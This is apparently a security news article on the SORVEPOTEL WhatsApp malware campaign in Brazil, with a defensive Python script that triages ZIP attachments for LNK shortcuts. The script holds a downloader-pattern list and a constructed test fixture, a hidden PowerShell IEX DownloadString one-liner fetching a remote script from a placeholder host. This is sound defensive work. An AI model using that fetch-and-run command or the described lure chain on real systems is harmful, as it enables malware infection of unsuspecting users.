New Malware Threat Targets Brazilian WhatsApp Users
Brazilian users are facing a serious cybersecurity threat from a new self-propagating malware family that spreads through WhatsApp. The campaign, tracked by Trend Micro researchers under the name SORVEPOTEL, abuses the trust users place in messages from known contacts to propagate quickly across Windows systems. Unlike much malware, which aims at data theft or extortion, SORVEPOTEL appears to be engineered primarily for rapid spread.
The Mechanics of SORVEPOTEL
Researchers, including Jeffrey Francis Bonaobra and Maristel Policarpio, have detailed how SORVEPOTEL spreads through deceptive phishing messages. These messages carry a malicious ZIP attachment and urge the recipient to open it on a desktop computer, which is necessary because the infection chain only executes on Windows. That insistence on a desktop suggests the operators are targeting businesses, where WhatsApp Web and the desktop client are in routine use, rather than consumers on mobile devices.
Once the attachment is opened, the malware executes. It then uses the WhatsApp Web or desktop session logged in on that machine to send spam messages to all of the victim's contacts, which typically ends with the account being banned for excessive spamming. Notably, there is no evidence that personal data is stolen or that files are encrypted; the purpose is purely to spread the malware further.
Infection Statistics Reveal Targeted Impact
Most of the reported infections, 457 out of 477, are concentrated in Brazil. Affected sectors include government, public services, manufacturing, technology, education, and construction. The concentration in Brazil shows a regionally targeted campaign that nevertheless cuts across many industries.
Phishing Tactics and Credibility
The initial infection vector for SORVEPOTEL is a phishing message sent from a contact that has already been compromised. This tactic lends an air of authenticity to the communication, making it easier for unsuspecting users to be fooled. The message typically contains a ZIP file that masquerades as an innocent receipt or a file related to health applications.
There is also evidence that the campaign distributes the same malicious ZIP files by email. These emails are crafted to appear to come from legitimate sources, further increasing the likelihood that recipients will open the attachment.
Execution and Malicious Payload
If a recipient falls for the ruse and opens the attachment, they launch a Windows shortcut (LNK) file inside the archive. The shortcut silently runs a PowerShell script, which downloads the primary malware payload from an attacker-controlled server such as sorvetenopate[.]com.
The downloaded payload establishes persistence on the infected computer so that it launches automatically whenever the system starts. It also runs a PowerShell command that contacts a command-and-control (C2) server for further instructions or additional components.
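The ZIP-with-LNK lure described in the two paragraphs above is something an analyst or mail gateway can triage offline. The following Python script is an added example written for this article; it is not code from Trend Micro or from the SORVEPOTEL samples. It parses the Shell Link (MS-SHLLINK) header and StringData of every .lnk inside a ZIP, flags double extensions such as `.pdf.lnk`, and searches the shortcut's command-line arguments for common PowerShell downloader patterns. The sample archive, the file name `RECIBO-2025.pdf.lnk`, the downloader one-liner and the `example.invalid` URL are all constructed for the demonstration and are not the real campaign's artifacts.

```python
"""Triage a ZIP attachment for a shortcut (.lnk) that launches a PowerShell downloader."""
import io
import re
import struct
import zipfile

# Shell Link header constants from MS-SHLLINK.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Generic downloader patterns (assumption: typical tradecraft, not the actual
# SORVEPOTEL command line, which the article does not reproduce).
SUSPICIOUS_ARG_PATTERNS = [
    r"powershell", r"-w(?:indowstyle)?\s+hidden", r"-e(?:c|nc|ncodedcommand)?\s",
    r"downloadstring", r"invoke-webrequest", r"\biwr\b", r"\biex\b",
    r"-nop(?:rofile)?", r"bypass",
]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk (name, relative_path, working_dir, arguments, icon_location)."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
            pos += 2
            nbytes = count * 2 if unicode else count
            raw = data[pos:pos + nbytes]
            pos += nbytes
            fields[key] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return fields


def triage_zip(zip_bytes: bytes) -> list:
    """Flag archive entries that look like an LNK-based lure; returns a list of findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            lower = info.filename.lower()
            if not lower.endswith(".lnk"):
                continue
            reasons = ["shortcut (.lnk) inside archive"]
            if lower.count(".") >= 2:
                reasons.append("double extension disguises shortcut as a document")
            try:
                args = parse_lnk(zf.read(info)).get("arguments", "")
            except ValueError as exc:
                args = ""
                reasons.append(f"malformed shortcut: {exc}")
            hits = [p for p in SUSPICIOUS_ARG_PATTERNS if re.search(p, args, re.IGNORECASE)]
            if hits:
                reasons.append(f"arguments match {len(hits)} downloader patterns: {args[:80]!r}")
            findings.append({"entry": info.filename, "reasons": reasons})
    return findings


def build_lnk(arguments: str) -> bytes:
    """Build a minimal Shell Link carrying only COMMAND_LINE_ARGUMENTS (constructed fixture, not malware)."""
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<I", HAS_ARGUMENTS | IS_UNICODE) + b"\x00" * (LNK_HEADER_SIZE - 24))
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


def build_sample_zip(include_lure: bool = True) -> bytes:
    """Constructed sample archive: a benign text file plus, optionally, a disguised shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "constructed benign file")
        if include_lure:
            zf.writestr("RECIBO-2025.pdf.lnk", build_lnk(
                '-NoProfile -WindowStyle Hidden -Command "IEX ((New-Object Net.WebClient)'
                ".DownloadString('https://example.invalid/stage1.ps1'))\""))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["entry"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Real lures usually place the PowerShell executable in the shortcut's LinkTargetIDList or LinkInfo, which this parser skips, so the command-line arguments are the useful signal; a shortcut with an empty or innocuous argument string still deserves a look if it is disguised with a double extension. The same `parse_lnk` routine can be pointed at the per-user and all-users Startup folders to review the persistence entries the next paragraph mentions.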
WhatsApp Propagation Strategy
The hallmark of SORVEPOTEL is its WhatsApp-centric self-propagation. If the malware detects an active WhatsApp Web session on the infected machine, it immediately sends the malicious ZIP file to all of the user's contacts and group chats. This rapid dissemination increases the chances of further infections and generates a large volume of spam from the compromised account.
As a result, many affected accounts are suspended or banned due to violations of WhatsApp’s terms of service. Security experts from Trend Micro express concern over how quickly and effectively threat actors are using popular communication platforms like WhatsApp to distribute malware with minimal involvement from users.